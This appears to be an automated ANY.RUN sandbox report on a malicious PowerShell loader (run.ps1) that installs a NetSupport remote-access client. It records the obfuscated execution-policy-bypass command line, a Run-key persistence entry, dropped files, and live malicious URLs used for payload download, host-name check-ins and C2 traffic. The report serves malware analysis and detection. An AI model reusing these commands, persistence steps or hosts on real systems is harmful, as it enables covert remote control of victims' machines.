File name: run.ps1
Full analysis: https://app.any.run/tasks/4800fda7-b580-434f-abbb-8925d2c30075
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 06, 2025, 21:37:26
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
netsupport
unwanted
remote
tool
reflection
loader
arch-exec
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (455), with no line terminators
MD5: 34461789A1F174ECF1CBFAFB6C862D49
SHA1: C3F90E8A3ABC878E94E8A563217ADC2E038073B3
SHA256: 2448A60F70FB81CE1EDF022D764A48C58C74ACEFD992CEE9E70EC5C6C5B51896
SSDEEP: 12:MU2ICFukuK1yIgP1OWu0tHz98RB2DOexWb2RKJFtH7LctR:M5IGu9IgtOWv6n2DOIRwv2R

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 4392)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4392)
      • powershell.exe (PID: 3560)
    • Executing a file with an untrusted certificate

      • client32.exe (PID: 3552)
      • client32.exe (PID: 3032)
    • NETSUPPORT mutex has been found

      • client32.exe (PID: 3552)
    • NETSUPPORT has been detected (SURICATA)

      • client32.exe (PID: 3552)
    • Connects to the CnC server

      • client32.exe (PID: 3552)
    • NETSUPPORT has been detected (YARA)

      • client32.exe (PID: 3552)
  • SUSPICIOUS

    • Application launched itself

      • powershell.exe (PID: 4392)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 4392)
      • powershell.exe (PID: 3560)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 4392)
    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 4392)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 4392)
    • Base64-obfuscated command line is found

      • powershell.exe (PID: 4392)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3560)
    • Detects reflection assembly loader (YARA)

      • powershell.exe (PID: 4392)
    • Writes data to a memory stream (POWERSHELL)

      • powershell.exe (PID: 3560)
    • Drop NetSupport executable file

      • powershell.exe (PID: 3560)
    • The process drops C-runtime libraries

      • powershell.exe (PID: 3560)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 3560)
    • Contacting a server suspected of hosting a CnC

      • client32.exe (PID: 3552)
    • Reads security settings of Internet Explorer

      • client32.exe (PID: 3552)
    • Potential Corporate Privacy Violation

      • client32.exe (PID: 3552)
    • Connects to the server without a host name

      • client32.exe (PID: 3552)
  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 4392)
      • client32.exe (PID: 3552)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 3560)
    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 3560)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 3560)
    • The process uses the downloaded file

      • powershell.exe (PID: 3560)
    • The executable file from the user directory is run by the Powershell process

      • client32.exe (PID: 3552)
    • Reads the computer name

      • client32.exe (PID: 3552)
    • Checks supported languages

      • client32.exe (PID: 3552)
      • remcmdstub.exe (PID: 5032)
    • The sample is compiled with English language support

      • powershell.exe (PID: 3560)
    • Manual execution by a user

      • OpenWith.exe (PID: 1356)
      • OpenWith.exe (PID: 5628)
      • notepad.exe (PID: 3848)
      • notepad.exe (PID: 1228)
      • client32.exe (PID: 3032)
      • remcmdstub.exe (PID: 5032)
      • OpenWith.exe (PID: 5092)
      • OpenWith.exe (PID: 3612)
    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 5628)
      • OpenWith.exe (PID: 5092)
    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 3848)
No Malware configuration.
No data.
Total processes: 131
Monitored processes: 13
Malicious processes: 3
Suspicious processes: 1

Behavior graph

Process nodes, in graph order:
  • start
  • powershell.exe
  • conhost.exe (no specs)
  • powershell.exe
  • #NETSUPPORT client32.exe
  • client32.exe (no specs)
  • remcmdstub.exe (no specs)
  • conhost.exe (no specs)
  • openwith.exe (no specs)
  • openwith.exe (no specs)
  • openwith.exe (no specs)
  • openwith.exe (no specs)
  • notepad.exe (no specs)
  • notepad.exe (no specs)

Process information

PID: 132
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1228
CMD: "C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\nskbfltr.inf
Path: C:\Windows\System32\notepad.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
PID: 1356
CMD: "C:\WINDOWS\System32\OpenWith.exe" C:\Users\admin\Desktop\HTCTL32.DLL
Path: C:\Windows\System32\OpenWith.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Pick an app
Exit code:
2147943623
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 3032
CMD: "C:\Users\admin\Desktop\client32.exe"
Path: C:\Users\admin\Desktop\client32.exe
Parent process: explorer.exe
User:
admin
Company:
NetSupport Ltd
Integrity Level:
MEDIUM
Description:
NetSupport Client Application
Exit code:
3221225781
Version:
V11.10
Modules
Images
c:\users\admin\desktop\client32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
PID: 3172
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: remcmdstub.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3552
CMD: "C:\Users\admin\AppData\Roaming\EdgdeCache\client32.exe"
Path: C:\Users\admin\AppData\Roaming\EdgdeCache\client32.exe
Parent process: powershell.exe
User:
admin
Company:
NetSupport Ltd
Integrity Level:
MEDIUM
Description:
NetSupport Client Application
Version:
V11.10
Modules
Images
c:\users\admin\appdata\roaming\edgdecache\client32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\users\admin\appdata\roaming\edgdecache\pcicl32.dll
PID: 3560
CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -nOPROFIle -EP byPASs -windowstYL h -encODEDCom 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
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 3612
CMD: "C:\WINDOWS\System32\OpenWith.exe" C:\Users\admin\Desktop\NSM.LIC
Path: C:\Windows\System32\OpenWith.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Pick an app
Exit code:
2147943623
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 3848
CMD: "C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\client32.ini
Path: C:\Windows\System32\notepad.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
PID: 4392
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\run.ps1
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 14 952
Read events: 14 945
Write events: 7
Delete events: 0

Modification events

(PID) Process: (3560) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: EdgdeCache
Value: C:\Users\admin\AppData\Roaming\EdgdeCache\client32.exe

(PID) Process: (3552) client32.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (3552) client32.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (3552) client32.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (5092) OpenWith.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll\OpenWithProgids
Operation: write
Name: dllfile
Value:

(PID) Process: (1356) OpenWith.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll\OpenWithProgids
Operation: write
Name: dllfile
Value:

(PID) Process: (5628) OpenWith.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll\OpenWithProgids
Operation: write
Name: dllfile
Value:
Executable files: 9
Suspicious files: 5
Text files: 10
Unknown types: 0

Dropped files

PID | Process | Filename | Type
4392 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wgxahbml.4gy.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4392 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary
MD5: 261D16F743E7B01743903A3FE1290590
SHA256: 7DDD85EE1C73B61B4D592F04DFABB0A9CF91741337F605E96D76404A295DBC8A
3560 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qci43txk.uc1.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3560 | powershell.exe | C:\Users\admin\AppData\Roaming\EdgdeCache\PCICL32.DLL | executable
MD5: D16FFA06A35601A73B73836BF905ED19
SHA256: 80CC439A0633ADD1DD964BB6BB40CCDCFEC3AE28DA39FD9416642AB0605D40AB
3560 | powershell.exe | C:\Users\admin\AppData\Roaming\EdgdeCache\TCCTL32.DLL | executable
MD5: 60AEA67E2659E1961369E04185C61ADF
SHA256: 8FD7F3EB1882755A8C5BA998409B20B240AED8EC025629B1679EA288EC2AE8AA
3560 | powershell.exe | C:\Users\admin\AppData\Roaming\EdgdeCache\PCICHEK.DLL | executable
MD5: A0B9388C5F18E27266A31F8C5765B263
SHA256: 313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
3560 | powershell.exe | C:\Users\admin\AppData\Roaming\EdgdeCache\client32.exe | executable
MD5: 290C26B1579FD3E48D60181A2D22A287
SHA256: 973836529B57815903444DD5D4B764E8730986B1BD87179552F249062EE26128
3560 | powershell.exe | C:\Users\admin\AppData\Roaming\EdgdeCache\remcmdstub.exe | executable
MD5: A0692E92F906639CA1816AF18F89B681
SHA256: 397FBA98EC417B1381040FF1AB40ECCC41E40ECA1BF2EE9B809814E5C2846E1A
4392 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7KUTKBRQEPGR0B8JX8N1.temp | binary
MD5: 261D16F743E7B01743903A3FE1290590
SHA256: 7DDD85EE1C73B61B4D592F04DFABB0A9CF91741337F605E96D76404A295DBC8A
4392 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF136238.TMP | binary
MD5: D040F64E9E7A2BB91ABCA5613424598E
SHA256: D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
HTTP(S) requests: 10
TCP/UDP connections: 24
DNS requests: 14
Threats: 7

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
5448 | svchost.exe | GET | 200 | 2.18.79.132:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
5448 | svchost.exe | GET | 200 | 104.121.145.122:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.18.79.132:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
4712 | MoUsoCoreWorker.exe | GET | 200 | 104.121.145.122:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
- | - | GET | 200 | 192.236.177.39:443 | https://stocktemplates.net/all/allstat/patched.php?cpnme=DESKTOP-JGLLJLD&usnme=admin&param=i8WC | unknown | - | - | -
3552 | client32.exe | POST | 502 | 79.132.128.77:443 | http://79.132.128.77/fakeurl.htm | unknown | - | - | malicious
3552 | client32.exe | GET | 200 | 104.26.1.231:80 | http://geo.netsupportsoftware.com/location/loca.asp | unknown | - | - | malicious
3552 | client32.exe | POST | 502 | 79.132.128.77:443 | http://79.132.128.77/fakeurl.htm | unknown | - | - | malicious
- | - | GET | 200 | 192.236.177.39:443 | https://stocktemplates.net/all/patch_info.php?compName=DESKTOP-JGLLJLD | unknown | text | 6.14 Kb | -
- | - | GET | 200 | 192.236.177.39:443 | https://stocktemplates.net/all/zall/faa.zip | unknown | compressed | 2.14 Mb | -

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 192.168.100.255:137 | - | - | - | unknown
4712 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5448 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 88.221.92.173:443 | www.bing.com | Akamai International B.V. | NL | whitelisted
- | - | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | unknown
4712 | MoUsoCoreWorker.exe | 2.18.79.132:80 | crl.microsoft.com | Akamai International B.V. | AT | whitelisted
5448 | svchost.exe | 2.18.79.132:80 | crl.microsoft.com | Akamai International B.V. | AT | whitelisted
4712 | MoUsoCoreWorker.exe | 104.121.145.122:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
5448 | svchost.exe | 104.121.145.122:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 4.231.128.59 | whitelisted
www.bing.com | 88.221.92.173, 88.221.92.175, 88.221.92.168, 88.221.92.167, 88.221.92.176, 88.221.92.170, 88.221.92.169, 88.221.92.172, 88.221.92.166 | whitelisted
google.com | 216.58.212.174 | whitelisted
crl.microsoft.com | 2.18.79.132, 2.18.79.141 | whitelisted
www.microsoft.com | 104.121.145.122 | whitelisted
stocktemplates.net | 192.236.177.39 | unknown
ukuhost.net | 79.132.128.77 | unknown
geo.netsupportsoftware.com | 104.26.1.231, 104.26.0.231, 172.67.68.212 | unknown
yogupay.net | - | unknown
self.events.data.microsoft.com | 13.69.116.107 | whitelisted

Threats

PID | Process | Class | Message
3552 | client32.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST)
3552 | client32.exe | Potential Corporate Privacy Violation | ET POLICY NetSupport GeoLocation Lookup Request
3552 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Checkin
3552 | client32.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST)
3552 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Checkin
2 ETPRO signatures available at the full report
No debug info